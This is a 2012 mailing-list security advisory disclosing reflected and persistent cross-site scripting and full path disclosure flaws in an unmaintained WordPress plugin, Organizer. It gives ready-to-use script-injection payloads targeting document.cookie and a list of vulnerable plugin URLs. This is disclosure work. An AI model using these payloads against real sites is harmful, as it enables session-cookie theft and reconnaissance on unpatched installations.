[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XSS and FPD vulnerabilities in Organizer for WordPress
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] XSS and FPD vulnerabilities in Organizer for WordPress
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Sun, 22 Apr 2012 23:51:49 +0300
Hello list!
I want to warn you about multiple security vulnerabilities in plugin
Organizer for WordPress. This is the first in series of advisories
concerning vulnerabilities in this plugin.
These are Cross-Site Scripting (reflected and persistent) and Full path
disclosure vulnerabilities.
-------------------------
Affected products:
-------------------------
Vulnerable are Organizer 1.2.1 and previous versions.
As answered me the developer of the plugin, he doesn't support it anymore
and will no be fixing multiple vulnerabilities in it, about which I've
informed him (these and many other vulnerabilities).
----------
Details:
----------
XSS (WASC-08):
http://site/wp-admin/admin.php?page=organizer/page/users.php&delete_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Persistent) (WASC-08):
POST request at page
http://site/wp-admin/admin.php?page=organizer/page/users.php
<script>alert(document.cookie)</script>
In field: "File extensions allowed".
Code will execute at the page users.php of the plugin.
Exploit:
http://websecurity.com.ua/uploads/2012/Organizer%20XSS-1.html
Full path disclosure (WASC-13):
http://site/wp-content/plugins/organizer/plugin_hook.php
http://site/wp-content/plugins/organizer/page/index.php
http://site/wp-content/plugins/organizer/page/dir.php
http://site/wp-content/plugins/organizer/page/options.php
http://site/wp-content/plugins/organizer/page/resize.php
http://site/wp-content/plugins/organizer/page/upload.php
http://site/wp-content/plugins/organizer/page/users.php
http://site/wp-content/plugins/organizer/page/view.php
------------
Timeline:
------------
2012.04.14 - announced at my site (http://websecurity.com.ua/5782/).
2012.04.15 - informed the developer.
2012.04.17 - the developer answered, that he didn't support the plugin
anymore.
2012.04.21 - disclosed at my site.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/